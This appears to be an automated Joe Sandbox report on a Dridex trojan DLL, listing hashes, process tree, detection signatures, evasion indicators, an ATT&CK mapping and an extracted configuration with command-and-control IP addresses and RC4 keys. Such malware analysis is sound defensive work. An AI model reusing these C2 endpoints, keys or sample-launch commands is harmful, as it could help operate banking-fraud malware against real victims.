Windows Analysis Report G7ABVJxc3Z.dll

Overview

General Information

Sample Name: G7ABVJxc3Z.dll
Analysis ID: 545442
MD5: 47c59530065e8e7e05a855879bf8a922
SHA1: 8fba3ea2428f92e8dc8497514d0817b54edc5be0
SHA256: e4db910a4147ac44bef76f71e6b0d6bd193b89a6268dda35f3b1c210cc111fe4
Tags: 32, dll, Dridex, exe, trojan

Detection

Dridex
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Call by Ordinal
Tries to delay execution (extensive OutputDebugStringW loop)
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses 32bit PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
One or more processes crash
Tries to load missing DLLs
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Abnormal high CPU Usage

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6380 cmdline: loaddll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6484 cmdline: rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5728 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 740 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6496 cmdline: rundll32.exe C:\Users\user\Desktop\G7ABVJxc3Z.dll,Wgpomsdeeomtunmdrt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 864 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}

Yara Overview

Memory Dumps

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000002.00000000.740603075.000000006E471000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |
| 00000003.00000002.831692261.000000006E471000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |
| 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |
| 00000002.00000000.742949248.000000006E471000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |
| 00000003.00000000.733407707.000000006E471000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |

Unpacked PEs

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 3.0.rundll32.exe.6e470000.5.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |
| 2.0.rundll32.exe.6e470000.2.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |
| 3.2.rundll32.exe.6e470000.2.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |
| 2.0.rundll32.exe.6e470000.5.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |
| 0.2.loaddll32.exe.6e470000.2.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security | |

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started, Author: Florian Roth, Data: Command: rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1, ProcessId: 6484

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 2.0.rundll32.exe.6e470000.2.unpack, Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}
Multi AV Scanner detection for submitted file
Source: G7ABVJxc3Z.dll, Virustotal: Detection: 64%
Source: G7ABVJxc3Z.dll, ReversingLabs: Detection: 67%
Machine Learning detection for sample
Source: G7ABVJxc3Z.dll, Joe Sandbox ML: detected
Source: G7ABVJxc3Z.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: G7ABVJxc3Z.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, IPs: 104.36.167.47:443
Source: Malware configuration extractor, IPs: 188.40.48.93:4664
Source: Malware configuration extractor, IPs: 162.241.33.132:9217
Source: Malware configuration extractor, IPs: 217.160.5.104:593
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View, ASN Name: GIGASNET-ASUS
Source: Joe Sandbox View, IP Address: 162.241.33.132
Source: Joe Sandbox View, IP Address: 104.36.167.47
Source: Amcache.hve.7.dr, String found in binary or memory: http://upx.sf.net

E-Banking Fraud:

Yara detected Dridex unpacked file
Source: Yara match, File source: 3.0.rundll32.exe.6e470000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.0.rundll32.exe.6e470000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.6e470000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.0.rundll32.exe.6e470000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.loaddll32.exe.6e470000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.rundll32.exe.6e470000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000000.740603075.000000006E471000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.831692261.000000006E471000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000000.742949248.000000006E471000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.733407707.000000006E471000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.734461323.000000006E471000.00000020.00020000.sdmp, type: MEMORY

                      System Summary:

                      Source: G7ABVJxc3Z.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: G7ABVJxc3Z.dll, Binary or memory string: OriginalFilenameHen.dllD vs G7ABVJxc3Z.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 740
                      Source: C:\Windows\System32\loaddll32.exe, Section loaded: lz32.dll
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E480730
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E489370
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E478428
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E48143C
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E47A4E8
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E471494
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E482234 NtDelayExecution
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E482820 NtAllocateVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E47BB44 NtClose
                      Source: C:\Windows\System32\loaddll32.exe, Process Stats: CPU usage > 98%
                      Source: G7ABVJxc3Z.dll, Virustotal: Detection: 64%
                      Source: G7ABVJxc3Z.dll, ReversingLabs: Detection: 67%
                      Source: G7ABVJxc3Z.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\G7ABVJxc3Z.dll,Wgpomsdeeomtunmdrt
                      Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll"
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 864
                      Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6496
                      Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6484
                      Source: C:\Windows\SysWOW64\WerFault.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE64C.tmp
                      Source: classification engine, Classification label: mal80.troj.evad.winDLL@9/10@0/4
                      Source: C:\Windows\SysWOW64\WerFault.exe, File read: C:\Windows\System32\drivers\etc\hosts
                      Source: G7ABVJxc3Z.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: G7ABVJxc3Z.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E47F6A8 push esi; mov dword ptr [esp], 00000000h0_2_6E47F6A9
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                      Malware Analysis System Evasion:

                      Tries to delay execution (extensive OutputDebugStringW loop)
                      Source: C:\Windows\System32\loaddll32.exe Section loaded: OutputDebugStringW count: 1023
                      Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1023
                      Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E480730 GetTokenInformation,GetSystemInfo,GetTokenInformation,0_2_6E480730
                      Source: Amcache.hve.7.dr Binary or memory string: VMware
                      Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.7.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.7.dr Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                      Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
                      Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.7.dr Binary or memory string: VMware7,1
                      Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 00000007.00000002.828834877.00000000046DD000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.me
                      Source: WerFault.exe, 00000007.00000002.828906056.00000000047D0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWX(n
                      Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E476D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,0_2_6E476D0C
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E483138 RtlAddVectoredExceptionHandler,0_2_6E483138
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1
                      Source: loaddll32.exe, 00000000.00000002.1053899342.00000000018E0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.742448049.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.739881173.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.733270905.0000000003A00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.734263987.0000000003A00000.00000002.00020000.sdmp Binary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1053899342.00000000018E0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.742448049.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.739881173.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.733270905.0000000003A00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.734263987.0000000003A00000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1053899342.00000000018E0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.742448049.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.739881173.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.733270905.0000000003A00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.734263987.0000000003A00000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1053899342.00000000018E0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.742448049.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.739881173.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.733270905.0000000003A00000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.734263987.0000000003A00000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,0_2_6E476D0C
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

                      Mitre Att&ck Matrix

                      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                      | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                      | Valid Accounts | Windows Management Instrumentation | DLL Side-Loading 1 | Process Injection 12 | Virtualization/Sandbox Evasion 1 | OS Credential Dumping | Query Registry 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
                      | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Process Injection 12 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                      | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                      | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rundll32 1 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
                      | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
                      | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Account Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
                      | External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
                      | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
                      | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 13 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

                      Behavior Graph

                      [Behavior graph, ID 545442. Sample: G7ABVJxc3Z.dll. Start date: 26/12/2021. Architecture: WINDOWS. Score: 80. Process chain: loaddll32.exe (signature: Tries to delay execution (extensive OutputDebugStringW loop)) started cmd.exe and rundll32.exe; cmd.exe started a second rundll32.exe; each rundll32.exe started WerFault.exe. Top-level signatures shown: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Dridex unpacked file; 3 other signatures. IPs shown: 162.241.33.132 (UNIFIEDLAYER-AS-1US, United States), 217.160.5.104 (ONEANDONE-ASBrauerstrasse48DE, Germany), 2 other IPs or domains.]

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      | Source | Detection | Scanner | Label |
                      | --- | --- | --- | --- |
                      | G7ABVJxc3Z.dll | 65% | Virustotal | |
                      | G7ABVJxc3Z.dll | 67% | ReversingLabs | Win32.Infostealer.Dridex |
                      | G7ABVJxc3Z.dll | 100% | Joe Sandbox ML | |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      | Source | Detection | Scanner | Label |
                      | --- | --- | --- | --- |
                      | 2.2.rundll32.exe.5b0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
                      | 3.0.rundll32.exe.3280000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
                      | 3.0.rundll32.exe.3280000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
                      | 3.2.rundll32.exe.3280000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
                      | 2.0.rundll32.exe.6e470000.2.unpack | 100% | Avira | HEUR/AGEN.1144420 |
                      | 2.0.rundll32.exe.5b0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
                      | 3.2.rundll32.exe.6e470000.2.unpack | 100% | Avira | HEUR/AGEN.1144420 |
                      | 3.0.rundll32.exe.6e470000.5.unpack | 100% | Avira | HEUR/AGEN.1144420 |
                      | 0.2.loaddll32.exe.1180000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
                      | 2.0.rundll32.exe.6e470000.5.unpack | 100% | Avira | HEUR/AGEN.1144420 |
                      | 0.2.loaddll32.exe.6e470000.2.unpack | 100% | Avira | HEUR/AGEN.1144420 |
                      | 2.0.rundll32.exe.5b0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
                      | 3.0.rundll32.exe.6e470000.2.unpack | 100% | Avira | HEUR/AGEN.1144420 |

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      | Name | Source | Malicious | Antivirus Detection | Reputation |
                      | --- | --- | --- | --- | --- |
                      | http://upx.sf.net | Amcache.hve.7.dr | false | | high |

                        Contacted IPs

                        Public

                        | IP | Domain | Country | ASN | ASN Name | Malicious |
                        | --- | --- | --- | --- | --- | --- |
                        | 162.241.33.132 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true |
                        | 104.36.167.47 | unknown | United States | 27640 | GIGASNET-ASUS | true |
                        | 217.160.5.104 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true |
                        | 188.40.48.93 | unknown | Germany | 24940 | HETZNER-ASDE | true |

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:545442
                        Start date:26.12.2021
                        Start time:17:25:28
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 39s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:G7ABVJxc3Z.dll
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:23
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal80.troj.evad.winDLL@9/10@0/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 56.1% (good quality ratio 52.2%)
                        • Quality average: 77.2%
                        • Quality standard deviation: 30.1%
                        HCA Information:
                        • Successful, ratio: 53%
                        • Number of executed functions: 24
                        • Number of non-executed functions: 7
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                        • Found application associated with file extension: .dll
                        Warnings:
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.182.143.212
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                        • Not all processes were analyzed; the report is missing behavior information

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        Domains

                        No context

                        ASN

                                                                                                      UzgDinGRAz.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      nr29dWSsgF.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      OQjpM0PPCp.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      zNMgAlNt7a.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      VowAWbKvhX.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47
                                                                                                      ZXD1iYQeIh.dllGet hashmaliciousBrowse
                                                                                                      • 104.36.167.47

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4d42c1f24c11b6c9a2fc199d7a28c798fe9e5a_82810a17_173d852c\Report.wer
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.9654598579721348
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:IniV0oX3CHBUZMX4jed+RU/u7sHS274ItWc:4i7XqBUZMX4jeH/u7sHX4ItWc
                                                                                                      MD5:93091EC43D665EC917DA2B6DEF3C1986
                                                                                                      SHA1:C2F1761C9D079582704C4E1EB9D7B6E071E2B8A0
                                                                                                      SHA-256:06910F058548C44A52ABA2D0F95F71C2F84B7CB608702A4D630DB06A5191D98E
                                                                                                      SHA-512:8A855DE218DAAEDF1479D6134A8513E7ED9836202A41B85AC90B3CF02F48B23EEE6E8DD8A4598D27732A394AB3F2EB08FEA7969B4ADC47B9ECFB513F4BADB153
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: Version=1 EventType=APPCRASH EventTime=132850096198877188 ReportType=2 Consent=1 UploadTime=132850096274970299 ReportStatus=96 ReportIdentifier=62f28998-b621-43c8-a94d-0bd9d1e3a538 IntegratorReportIdentifier=c6462a36-f574-45d9-871e-0f288ca72175 Wow64Host=34404 Wow64Guest=332 NsAppName=rundll32.exe OriginalFilename=RUNDLL32.EXE AppSessionGuid=00001954-0001-001b-c654-d25175fad701 TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000bcc5dc3222034d3f257f1fd35889e5be90f09b5f!
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dd9d398ae70aa8478325646a49f7ebef948b8_82810a17_125d0cc0\Report.wer
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
